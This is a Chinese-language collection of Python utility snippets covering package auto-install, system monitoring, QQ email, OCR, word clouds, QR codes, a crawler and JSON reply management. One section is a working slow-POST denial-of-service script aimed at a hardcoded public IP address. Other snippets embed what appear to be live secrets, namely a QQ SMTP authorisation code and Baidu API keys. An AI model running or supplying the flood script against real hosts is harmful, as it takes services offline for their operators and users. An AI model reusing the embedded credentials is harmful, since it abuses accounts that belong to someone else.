自动安装外部依赖包
import os
import time
def auto_install_package(packages_name_list):
installed_package = list()
not_installed_package = list()
p = os.popen("pip3 list") # 获取所有包名 直接用 pip list 也可获取
pip_list = p.read().lower() # 读取所有内容
for package_name in packages_name_list:
if package_name.lower() in pip_list:
installed_package.append(package_name)
else:
not_installed_package.append(package_name)
if len(installed_package) != 0:
for package_name in installed_package:
print("[INFO] 依赖包 {} 已存在!".format(package_name))
else:
print("[INFO] 未检测到任何已安装依赖包!")
if len(not_installed_package) != 0:
for package_name in not_installed_package:
print("[INFO] 检测到 {} 包未安装 正在自动安装中...".format(package_name))
start_time = time.time()
p = os.popen("pip3 install {} -i https://pypi.douban.com/simple/".format(package_name))
if "Success" in p.read():
spend_time = time.time() - start_time
print("[INFO Spend_time:{}s] 依赖包 {} 安装成功!".format(round(spend_time,2),package_name))
else:
print('[INFO] 依赖包 {} 安装失败! {}'.format(package_name,p.read()))
else:
print("[INFO] 引入的全部依赖包已存在!")
auto_install_package(["matplotlib","wget"])
import matplotlib
import wget
获取系统信息和运行状态
import os
def auto_install_package(packages_name_list):
p = os.popen("pip3 list") # 获取所有包名 直接用 pip list 也可获取
pip_list = p.read() # 读取所有内容
for package_name in packages_name_list:
if package_name.lower()in pip_list or package_name.title()in pip_list:
print("[PACKAGE_INFO]已存在外部依赖包 {}".format(package_name))
os.system("cls")
else:
print("[PACKAGE_INFO]检测到{}包未安装 正在自动安装中...".format(package_name))
p = os.popen("pip3 install {}".format(package_name))
if "Success" in p.read():
print("[PACKAGE_INFO]依赖包{}安装成功!".format(package_name))
auto_install_package(["psutil","requests"])
import psutil
import datetime
import platform
import time
import re
import requests
def get_ip_info():
res1 = requests.get('http://httpbin.org/ip')
ip = re.findall('"origin": "(.*?), .*?"', res1.text)[0]
res2 = requests.get('https://www.hao7188.com/ip/{}.html'.format(ip))
ip_dress_data = re.findall('<span>(.*?)</span>', res2.text)[2]
return ip,ip_dress_data
def io_get_bytes(sent=False, recv=False):
internet = psutil.net_io_counters()
if internet == None:
return None
io_sent = internet.bytes_sent
io_recv = internet.bytes_recv
if sent == True and recv == True:
return [io_sent, io_recv]
elif sent == True:
return io_sent
elif recv == True:
return io_recv
else:
return None
print("************************************************")
print("* 系统检测工具 *")
print("************************************************")
try:
net_io = psutil.net_io_counters()
net_in = psutil.net_io_counters(pernic=True)
print('[网络信息]')
print("--------------------------------------------------------")
print("IP地址: {}".format(get_ip_info()[0]))
print("地理位置:", get_ip_info()[1])
print(f'发送流量: {round(net_io.bytes_sent/1024**2)}M')
print(f'接收流量: {round(net_io.bytes_recv/1024**2)}M')
print(f'发送数据包: {round(net_io.packets_sent/1024**1)}')
print(f'接收数据包: {round(net_io.packets_recv/1024**1)}')
print("--------------------------------------------------------")
except Exception as e:
print("网络检测错误:{}".format(e))
try:
print('[磁盘情况]')
print("--------------------------------------------------------")
for i in range(len(psutil.disk_partitions())):
disk=psutil.disk_partitions()[i].device
print(psutil.disk_partitions()[i].device)
print(f"磁盘空间: {round(psutil.disk_usage(disk).used/1024**3)}/{round(psutil.disk_usage(disk).total/1024**3)}G {round(psutil.disk_usage(disk).percent)}%")
print(f"磁盘可用: {round(psutil.disk_usage(disk).free/1024**3)}G")
print("--------------------------------------------------------")
except Exception as e:
print("磁盘检测错误: {}".format(e))
try:
print("[系统信息]")
print("--------------------------------------------------------")
print(f"当前用户: {psutil.users()[0][0]}")
print(f"电脑名: {platform.node()}")
print(f"系统版本: {platform.platform()}")
print(f"CPU核心数: {psutil.cpu_count(logical=False)}")
print(f"CPU型号: {platform.processor()}")
print(f"开机时间: {datetime.datetime.fromtimestamp(psutil.users()[0][3])}")
print(f"运行时间: {datetime.datetime.now()-datetime.datetime.fromtimestamp(psutil.users()[0][3])}")
print("--------------------------------------------------------")
except Exception as e:
print("系统检测错误:{}".format(e))
interval = 1 # 每隔 interval 秒获取一次网络IO信息, 数值越小, 测得的网速越准确
unit='s' #时间单位
k = 1024 # 一 K 所包含的字节数
m = 1048576 # 一 M 所包含的字节数
while True:
byteSent1 = io_get_bytes(sent=True) # 获取开机以来上传的字节数
byteRecv1 = io_get_bytes(recv=True) # 获取开机以来下载的字节数
time.sleep(interval) # 间隔 interval 秒
byteSent2 = io_get_bytes(sent=True) # 再次获取开机以来上传的字节数
byteRecv2 = io_get_bytes(recv=True) # 再次获取开机以来下载的字节数
sent = byteSent2 - byteSent1 # interval 秒内所获取的上传字节数
recv = byteRecv2 - byteRecv1 # interval 秒内所获取的下载字节数
if sent > m:
sent = sent / m
sent_unit = 'M/' + unit
elif sent > k:
sent = sent / k
sent_unit = 'K/' + unit
elif sent >= 0:
sent_unit = 'B/' + unit
if recv > m:
recv = recv / m
recv_unit = 'M/' + unit
elif recv > k:
recv = recv / k
recv_unit = 'K/' + unit
elif recv >=0:
recv_unit = 'B/' + unit
#
cpu_percent=psutil.cpu_percent()
#内存消耗百分比
memory_spend_percent=psutil.virtual_memory().percent
#内存消耗
memory_spend_sum=round(psutil.virtual_memory().used/1024**2)
#内存总量
memory_all_sum=round(psutil.virtual_memory().total/1024**2)
#内存空闲
memory_free_sum=round(psutil.virtual_memory().free/1024**2)
print(f'\r[上传速度]: {round(sent,2)} {sent_unit} [下载速度]: {round(recv,2)} {recv_unit} [CPU使用率]:{cpu_percent}% [内存占用]: {memory_spend_percent}%({memory_spend_sum}/{memory_all_sum}M)',end="")
QQ邮箱自动化
import smtplib,time
from email.mime.text import MIMEText
host_server='smtp.qq.com' #QQ邮件的smtp主机
sender='[email protected]' #发送者邮箱
sender_pwd='gtzlpasfrzbubeeh' #发送者密码或秘钥
receiver='[email protected]' #收信人邮箱
mail_content="需要发送的文本消息" #发送的内容
mail_title='这是一封python发的邮件' #信件标题
msg=MIMEText(mail_content) #生成文本消息对象
msg['Subject']=mail_title
msg['From']='浪子与诗' #发送者显示名称
msg['To']=receiver #接受者显示名称
smtp=smtplib.SMTP_SSL(host_server,465)
smtp.login(sender,sender_pwd)
smtp.sendmail(sender,receiver,msg.as_string())
smtp.quit()
print('To:{} 邮箱发送成功!'.format(receiver))
文本统计生成词云图片
import wordcloud
import jieba
f=open("xx.txt","r",encoding="utf-8")
t=f.read()
f.close()
ls=jieba.lcut(t)
txt=" ".join(ls)
w=wordcloud.WordCloud(
random_state=300,#配色方案数
width=300,#图片宽度
height=200,#图片高度
background_color="white",#背景颜色
max_words=20,#图片容纳最大词数
font_path="simfang.ttf"#字体
)
w.generate(txt)
w.to_file("xx.png")
批量图片识别
#安装外部依赖库 pip install baidu-aip
#脚本文件要和“图片”文件夹在同一个目录
#将需要录入的选择题图片放入“图片”文件夹后执行脚本
#录入完成后题目保存的文件为"识别结果.txt"
#api接口来源 百度AI平台
import os
from aip import AipOcr
def collect(img_dress):
global sum
try:
cilent=AipOcr(appId="16678637",secretKey="4E4kUEyQvqnRqWTccPfjFWDspuXIyrga",apiKey="2UsI44XqxiquPPjxtHENUPgk")
with open(img_dress,"rb") as f:
image=f.read()
print('文件:'+img_dress+' 开始录入...还剩:'+str(sum-1)+'张')
data=cilent.basicAccurate(image)
for i in range(len(data['words_result'])):
line=data['words_result'][i]['words']
with open('识别结果.txt','a') as f:
f.write(line.replace('□','').replace('⊙','').replace('●','')+'\n')
if i == len(data['words_result'])-1:
f.write('---------------------------------------------来自图片:'+os.path.basename(img_dress))
print('录入成功!')
except Exception as e:
print(e)
all_imgname_list=os.listdir('图片')
print(all_imgname_list)
sum = len(all_imgname_list)
print('图片总数:' + str(len(all_imgname_list)))
for oneimg_name in all_imgname_list:
collect('图片\\'+oneimg_name)
sum-=1
print('全部识别录入任务已完成!')
DDOS原理
import socket
import time
import threading
# Pressure Test,ddos tool
# ---------------------------
MAX_CONN = 20000
PORT = 80
HOST = "122.190.3.227"
PAGE = "/?action=cal&randnum=0.20059459460011975"
# ---------------------------
buf = "POST {} HTTP/1.1\r\n"\
"Host: {}\r\n"\
"Content-Length: 10000000\r\n"\
"Cookie: dklkt_dos_test\r\n"\
"\r\n".format(PAGE, HOST)
socks = []
def conn_thread():
global socks
for i in range(0, MAX_CONN):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((HOST, PORT))
s.send(buf.encode())
print("Send buf OK!,conn=%d\n" % i)
socks.append(s)
except Exception as ex:
print("Could not connect to server or send error:%s" % ex)
time.sleep(10)
# end def
def send_thread():
global socks
while True:
for s in socks:
try:
s.send(b"f")
# print "send OK!"
except Exception as ex:
print("Send Exception:%s\n" % ex)
socks.remove(s)
s.close()
time.sleep(1)
# end def
conn_th = threading.Thread(target=conn_thread, args=())
send_th = threading.Thread(target=send_thread, args=())
conn_th.start()
send_th.start()
python文件批量添加格式说明
import os
def add_charset(path,charset_mode):
if isinstance(path,str) and isinstance(charset_mode,str):
if charset_mode in ['utf-8']:
with open(path,'r+',encoding='utf-8') as f1:
data=f1.readlines()
data.insert(0,'#-*- coding:{} -*-\n'.format(charset_mode))
with open(path,'w',encoding='utf-8') as f2:
f2.writelines(data)
print("文件:{} 编码格式添加成功!".format(path))
def set_charset(dir_path,charset_mode):
for rt, dirs, files in os.walk(dir_path):
for f in files:
path=rt+'\\'+f
if path.endswith('.py'):
add_charset(path,charset_mode)
set_charset(r"C:\Users\Mr.m\Desktop\QQ自动发卡机器人","utf-8")
获取项目目录依赖包
import os
def loop_walk(dir_path):
filesname=[]
package_list_list=[]
package_list=[]
package=[]
for rt, dirs, files in os.walk(dir_path):
for file in files:
filesname.append(file)
path=rt+'\\'+file
if path.endswith('.py'):
package_list_list.append(get_require_package(path))
for i in range(len(package_list_list)):
for j in range(len(package_list_list[i])):
package_list.append(package_list_list[i][j])
destination_fname=list(map(lambda x:x.split('.py')[0],filesname))
print(destination_fname)
package_list=list(set(package_list))
for package_name in package_list:
if package_name not in destination_fname:
package.append(package_name)
return package
def get_require_package(path):
packages_name_list=[]
packages_name=[]
with open(path,'r+',encoding='utf-8') as f:
demo_list=f.readlines()
for demo_line in demo_list:
if 'import' in demo_line:
demo_destination_list=demo_line.split(' ')
for demo_name in demo_destination_list:
if demo_name not in ['from','import','as','.','*\n'] and not demo_name.startswith('..'):
packages_name_list.append(demo_name)
packages_name=list(map(lambda x:x.replace('\n',''),packages_name_list))
return packages_name
local_package=loop_walk(r'C:\Users\Mr.m\Desktop\QQ自动发卡机器人')
二维码制作
from MyQR import myqr
import os
version, level, qr_name = myqr.run(
words="http://qm.qq.com/cgi-bin/qm/qr?k=P878Xd3c4KMpImkLkTFFWzD1gitIyrlw", # 可以是字符串,也可以是网址(前面要加http(s)://)
version=2, # 设置容错率为最高
level='H', # 控制纠错水平,范围是L、M、Q、H,从左到右依次升高
picture="b1.gif", # 将二维码和图片合成
colorized=True, # 彩色二维码
contrast=1.0, # 用以调节图片的对比度,1.0 表示原始图片,更小的值表示更低对比度,更大反之。默认为1.0
brightness=1.0, # 用来调节图片的亮度,其余用法和取值同上
save_name="b2.gif", # 保存文件的名字,格式可以是jpg,png,bmp,gif
save_dir=os.getcwd() # 控制位置
)
图片批量转文字
#安装外部依赖库 pip install baidu-aip
#脚本文件要和“图片”文件夹在同一个目录
#将需要录入的选择题图片放入“图片”文件夹后执行脚本
#录入完成后题目保存的文件为"识别结果.txt"
import os
from aip import AipOcr
def collect(img_dress):
global sum
try:
cilent=AipOcr(appId="16678637",secretKey="4E4kUEyQvqnRqWTccPfjFWDspuXIyrga",apiKey="2UsI44XqxiquPPjxtHENUPgk")
with open(img_dress,"rb") as f:
image=f.read()
print('文件:'+img_dress+' 开始录入...还剩:'+str(sum-1)+'张',end='')
data=cilent.basicAccurate(image)
for i in range(len(data['words_result'])):
line=data['words_result'][i]['words']
with open('识别数据.txt','a') as f:
f.write(line.replace('□','').replace('⊙','').replace('●','')+'\n')
if i == len(data['words_result'])-1:
f.write('来源:'+img_dress)
f.write('\n----------------------\n')
print(' [+]录入成功!')
except Exception as e:
print(e)
all_imgname_list=os.listdir('图片')
print(all_imgname_list)
sum = len(all_imgname_list)
print('图片总数:' + str(len(all_imgname_list)))
for oneimg_name in all_imgname_list:
collect('图片\\'+oneimg_name)
sum-=1
print('----------------全部识别录入任务已完成!----------------')
python2代码批量转换为python3
#!/usr/bin/env python
import sys
from lib2to3.main import main
sys.exit(main("lib2to3.fixes"))
命令行执行python 2to3.py -w 文件地址/目录地址
开始转换
注意:生成的python3代码会覆盖python2代码
json实现的关键字数据管理
import json
import os
#自动创建数据文件
if not os.path.exists('reply.json'):
f = open('reply.json', 'w', encoding='utf-8')
json.dump({'hello': '你好'}, fp=f, ensure_ascii=False)
f.close()
#查看已定义回复内容
def all_key_reply():
with open('reply.json', 'r', encoding='utf-8') as f:
dic_data=json.load(fp=f)
print("================================")
print("[关键字] [回复内容]")
for k,v in dic_data.items():
if isinstance(v,list):
print(k+"\t\t\t"+"; ".join(v))
elif isinstance(v,str):
print(k+"\t\t\t"+v)
else:
print('存在错误数据!')
print("================================")
#增加自定义回复内容
def add_key_reply(key,reply_content):
if isinstance(key,str) and isinstance(reply_content,str):
with open('reply.json', 'r', encoding='utf-8') as f:
dic_data = json.load(fp=f)
dic_data.setdefault(key,reply_content)
with open('reply.json','w',encoding='utf-8') as f:
json.dump(dic_data,fp=f,ensure_ascii=False)
print('关键字添加成功!')
#删除自定义回复内容
def delete_key_reply(key):
if isinstance(key,str):
try:
with open('reply.json', 'r', encoding='utf-8') as f:
dic_data = json.load(fp=f)
dic_data.pop(key)
with open('reply.json', 'w', encoding='utf-8') as f:
json.dump(dic_data, fp=f, ensure_ascii=False)
print('关键字删除成功!')
except KeyError:
print('删除的关键字不存在!')
#修改自定义回复内容
def change_key_reply(key,new_reply_content):
if isinstance(key,str) and isinstance(new_reply_content,str):
try:
with open('reply.json', 'r', encoding='utf-8') as f:
dic_data = json.load(fp=f)
dic_data[key]=new_reply_content
with open('reply.json', 'w', encoding='utf-8') as f:
json.dump(dic_data, fp=f, ensure_ascii=False)
print('修改成功!')
except KeyError:
print('修改的关键字不存在!')
print('========自定义回复内容管理========')
print('1.查看全部关键字回复内容')
print('2.增加自定义回复内容')
print('3.删除自定义回复内容')
print('4.修改自定义回复内容')
while True:
buttton=input('>>')
if buttton == '1':
all_key_reply()
elif buttton == '2':
key=input('请输入添加的关键字:')
reply_content=input('请输入相应的回复内容:')
add_key_reply(key,reply_content)
elif buttton == '3':
key=input('请输入要删除的关键字:')
delete_key_reply(key)
elif buttton == '4':
key=input('请输入修改的关键字:')
new_reply_content=input('请输入回复的内容:')
change_key_reply(key,new_reply_content)
else:
print('输入有误!')
轻量级多线程爬虫
import requests
import re
import json
import threading
import queue
from lxml import etree
q=queue.Queue(20)
class Xspider(object,):
def __init__(self,url,filename="json"):
if isinstance(filename,str):
self.filename=filename
if isinstance(url,list):
self.urls=url
self.items=[]
self.match_rules=[]
self.f=open(self.filename,"w",encoding="utf-8")
def set_spider(self,headers=None,proxies=None,params=None,cookies=None,allow_redirects=False,verify=True,timeout=5):
self.headers=headers
self.proxies=proxies
self.params=params
self.cookies=cookies
self.allow_redirects=allow_redirects
self.verify=verify
self.timeout=timeout
def add_item(self,itme_name,match_rule):
self.items.append(itme_name)
self.match_rules.append(match_rule)
def get_html(self,url):
res=requests.get(url)
res.encoding="utf-8"
q.put(res)
def parse(self):
all_matched_data=[]
item_value_dic={}
res = q.get()
for match_rule in self.match_rules:
html=etree.HTML(res.text)
matched_data=html.xpath(match_rule)
all_matched_data.append(matched_data)
try:
for j in range(len(all_matched_data[0][0])):
for i,item in zip(range(len(all_matched_data[0])),self.items):
item_value=all_matched_data[i][j]
item_value_dic.update({item:item_value})
print(item_value_dic)
self.save_file(item_value_dic)
except:
pass
def save_file(self,item_value_dic):
self.f.write(json.dumps(item_value_dic,ensure_ascii=False)+'\n')
def run(self):
for url in self.urls:
t1=threading.Thread(target=self.get_html,args=(url,))
t2=threading.Thread(target=self.parse)
t1.start()
t2.start()
if __name__ == '__main__':
urls=[]
for i in range(1,200):
urls.append('https://ke.qq.com/course/list?mt=1001&page={}'.format(i))
xspider=Xspider(urls,filename="data.json")
xspider.set_spider()
xspider.add_item('标题','//li[contains(@class,"course-card-item")]/h4/a/text()')
xspider.add_item('链接','//li[contains(@class,"course-card-item")]/a/@href')
xspider.run()
远程内容自动更新到本地
# 将远程内容自动更新到本地模块
def auto_update(remote_content):
if isinstance(remote_content,str):
if not os.path.exists("recent.txt"):
f=open("recent.txt","w",encoding="utf-8")
f.close()
with open("recent.txt","r",encoding="utf-8") as f:
local_content=f.read()
if remote_content != local_content:
local_content = remote_content
with open("recent.txt","w",encoding="utf-8") as f:
f.write(local_content)
print("[INFO {}] 内容同步成功!".format(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())))
else:
print("[INFO {}] 内容已是最新内容!".format(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())))
else:
raise Exception('参数错误!')
装饰器的使用
import threading
class Myclass():
def __init__(self):
self.funcs = dict()
def gather(self,v):
def decorator(f):
if v == "ok":
self.funcs[f] = v
else:
pass
return decorator
def run(self):
for f,v in zip(self.funcs.keys(),self.funcs.values()):
# print(f,v)
f(v)
c = Myclass()
@c.gather('ok')
def _(v):
print(1)
@c.gather('no')
def _(v):
print(2)
c.run()